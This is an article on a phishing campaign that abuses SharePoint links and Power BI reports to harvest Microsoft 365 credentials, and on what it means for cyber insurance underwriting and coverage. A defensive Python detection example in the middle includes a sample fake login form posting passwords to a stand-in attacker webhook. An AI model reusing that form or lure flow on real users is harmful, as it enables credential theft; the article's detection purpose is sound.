Power BI Phishing: How Trusted Platforms Fuel Credential Theft & Insurance Risks
How the Power BI phishing campaign exploits SharePoint trust to steal credentials, reshaping cyber insurance underwriting and claims frequency.
When Trusted Platforms Become Phishing Bait: What the Power BI Campaign Means for Cyber Insurance
On February 6, 2025, a new threat intelligence report detailed a phishing campaign that exploits two of the most widely trusted business platforms: Microsoft SharePoint and Power BI. Attackers are sending emails containing legitimate-looking SharePoint links that redirect recipients to a Power BI dashboard. That dashboard hosts a fake Microsoft 365 login page, designed to harvest credentials. The campaign is notable not because of technical sophistication, but because it weaponizes the very tools organizations rely on for daily collaboration and reporting.
For insurance professionals and risk engineers, this attack vector represents a shift in how credential theft occurs—and a corresponding shift in how claims frequency, coverage triggers, and underwriting signals should be evaluated.
What Happened: A Closer Look at the Campaign
The campaign begins with a phishing email that includes a link to a SharePoint file or site. The link is genuine—it points to a legitimate SharePoint domain (e.g., *.sharepoint.com). Once the recipient clicks, SharePoint automatically redirects the user to a Power BI report hosted on the same tenant. The report contains an embedded iframe or a custom visual that displays a convincing Microsoft login prompt.
Because the entire flow stays within Microsoft’s trusted domains, traditional email security filters—which rely on domain reputation and URL scanning—often fail to flag the message as malicious. The user sees a familiar SharePoint interface and a Power BI dashboard, both of which are commonly used in their daily workflow. Trust is the attacker’s primary weapon.
The threat report indicates that the campaign has targeted multiple sectors, including financial services, healthcare, and manufacturing. The stolen credentials are then used for lateral movement, data exfiltration, or as a stepping stone to business email compromise (BEC) attacks.
Why This Matters for Insurance: Claims Frequency and Coverage Gaps
This attack vector directly impacts several areas of cyber insurance exposure:
Increased claims frequency for credential theft. Credential theft is already a leading cause of data breaches and ransomware incidents. When attackers use trusted platforms, the success rate of phishing increases, which means more incidents per insured entity. For underwriters, this suggests that frequency assumptions based on traditional phishing rates may be understated.
Coverage gaps in social engineering and BEC policies. Many cyber insurance policies include sublimits for social engineering fraud or authorized payment instructions. However, the Power BI campaign does not involve direct payment instructions—it steals credentials. Those credentials can later be used to initiate fraudulent wire transfers or modify invoices. The trigger for coverage may depend on whether the loss is classified as “unauthorized access” (covered under network security) or “voluntary parting” (often subject to lower sublimits or exclusion). The ambiguity creates potential disputes.
Policy language for “trusted third-party” services. Some policies exclude losses arising from the use of “trusted” or “authorized” third-party services. Since SharePoint and Power BI are enterprise tools, a loss stemming from their abuse might fall into a gray area. Risk engineers and brokers need to review whether their clients’ policies explicitly address credential theft via legitimate SaaS platforms.
Technical Details in Business Language
From a technical standpoint, the attack is a form of “living off the land” (LotL) applied to phishing. The attacker does not host malicious infrastructure on their own domains. Instead, they abuse the trust that organizations place in Microsoft’s cloud ecosystem.
- SharePoint link: The initial email contains a URL that points to a SharePoint resource. Because the domain is legitimate, email gateways that only check domain reputation pass the message.
- Power BI redirect: SharePoint automatically redirects the user to a Power BI report. This is normal behavior—Power BI reports are often linked from SharePoint. The attacker has uploaded a report that contains a malicious visual or embedded web page.
- Fake login form: The Power BI report displays a login prompt that mimics the Microsoft 365 sign-in page. The user enters their credentials, which are sent to the attacker’s server (often via a webhook or a separate form submission).
- No malware involved: The entire attack is social engineering. No files are downloaded, no macros are executed. This makes it invisible to endpoint detection and response (EDR) tools that focus on executable threats.
For a CISO, the key takeaway is that security awareness training must now include scenarios where trusted internal tools are used as phishing vectors. For an underwriter, the takeaway is that traditional controls (email filtering, antivirus) are insufficient to prevent this class of incident.
Implications for Coverage and Underwriting
Underwriting signals to watch for:
- Multi-factor authentication (MFA) coverage: Does the client enforce MFA for all external-facing applications, including Power BI? If MFA is not required, the stolen credentials can be used directly. If MFA is enforced, the attacker may attempt to bypass it (e.g., through MFA fatigue or session cookie theft). Underwriters should ask whether the client has conditional access policies that block access from untrusted locations.
- Email security controls: Does the client use advanced email security that inspects URL redirect chains and attachment content, not just domain reputation? Solutions that perform real-time scanning of SharePoint links and Power BI reports are still rare.
- Security awareness training: Has the client trained employees to recognize phishing attempts that originate from internal domains? Many awareness programs focus on external emails with suspicious addresses. This campaign bypasses that heuristic.
- Incident response readiness: How quickly can the client detect credential theft when it occurs via a legitimate platform? Logs from SharePoint and Power BI may not be monitored with the same rigor as traditional email logs.
Coverage implications:
- BEC vs. network security: If the stolen credentials are used to initiate a fraudulent wire transfer, the claim may fall under social engineering fraud. If the credentials are used to access data or deploy ransomware, it falls under network security. Policies with separate sublimits for these perils may result in insufficient coverage depending on the attack chain.
- System failure exclusion: Some policies exclude losses caused by “failure of the insured’s security controls.” If the client relies on Microsoft’s security features (e.g., SharePoint’s default sharing settings) and those features are exploited, the carrier might argue that the loss was foreseeable and therefore excluded. This is a developing area of case law.
- Aggregation risk: If multiple clients in the same sector are hit by the same campaign, an insurer could face accumulation of claims. Underwriters should consider whether their portfolio is concentrated in industries that heavily use Power BI and SharePoint.
Actionable Recommendations
For CISOs and risk engineers:
- Implement conditional access policies that require MFA for Power BI access, and block access from non-corporate devices or unknown IP ranges.
- Disable external sharing of Power BI reports unless explicitly approved. Many organizations leave sharing enabled by default.
- Deploy email security solutions that can follow URL redirects and inspect the final landing page’s content. Tools that use computer vision to detect fake login forms can help.
- Include “trusted platform phishing” scenarios in security awareness training. Simulate attacks that use SharePoint and Power BI links to test employee responses.
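The attack chain described under "Technical Details in Business Language" and the redirect-following email control recommended above can be illustrated with an added example; this is not code from the original article or from any vendor. It walks a (constructed) redirect chain, flags the SharePoint-to-Power BI pattern, and parses the final landing page for a form that collects a password but posts it somewhere other than Microsoft's sign-in hosts. The chain, the sample page, the `hooks.example.net` webhook host and the trusted-host set are all assumptions made for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts where a genuine Microsoft 365 sign-in form may post credentials
# (assumed for this example, not a complete inventory).
TRUSTED_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com"}

class FormScanner(HTMLParser):
    """Record each <form> action and whether it contains a password field."""
    def __init__(self):
        super().__init__()
        self.forms = []  # [{"action": str, "password": bool}, ...]

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "password": False})
        elif tag == "input" and (a.get("type") or "").lower() == "password" and self.forms:
            self.forms[-1]["password"] = True

def host_of(url):
    return (urlparse(url).hostname or "").lower()

def under(host, suffix):
    """True if host is suffix itself or a subdomain of it."""
    return host == suffix or host.endswith("." + suffix)

def assess(chain, landing_html):
    """Findings for a followed redirect chain plus the HTML it lands on."""
    findings = []
    hosts = [host_of(u) for u in chain]
    # The pattern from the article: a real SharePoint link landing on Power BI.
    if hosts and under(hosts[0], "sharepoint.com") and any(under(h, "powerbi.com") for h in hosts[1:]):
        findings.append("sharepoint-link-lands-on-powerbi")
    scanner = FormScanner()
    scanner.feed(landing_html)
    for form in scanner.forms:
        if form["password"]:
            # A relative action posts back to the landing host itself.
            target = host_of(form["action"]) or (hosts[-1] if hosts else "")
            if target not in TRUSTED_LOGIN_HOSTS:
                findings.append("credential-form-posts-to:" + target)
    return findings

# Constructed sample: a SharePoint link redirecting to a Power BI report whose
# embedded page sends the password to an attacker-controlled webhook host.
SAMPLE_CHAIN = ["https://contoso.sharepoint.com/:f:/s/Finance/Q1-report",
                "https://app.powerbi.com/view?r=REPORT_ID_PLACEHOLDER"]
SAMPLE_PAGE = ('<html><body><h1>Sign in to Microsoft 365</h1>'
               '<form method="post" action="https://hooks.example.net/collect">'
               '<input name="user"><input type="password" name="pass"></form></body></html>')
```

A gateway that only scores the first URL's domain would pass SAMPLE_CHAIN; the findings come from following the chain and reading the landing page.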
For insurance professionals:
- Review policy wordings for exclusions related to trusted third-party services. Ensure that credential theft via SaaS platforms is explicitly addressed.
- Update underwriting questionnaires to include questions about MFA enforcement on collaboration tools, email security capabilities, and incident response monitoring for cloud platforms.
- Consider portfolio concentration risk if many insureds rely on the same platforms (e.g., Microsoft 365) and could be affected by a single campaign.
For more guidance on how these attack vectors affect cyber insurance underwriting and claims, visit Resiliently’s cyber risk resources.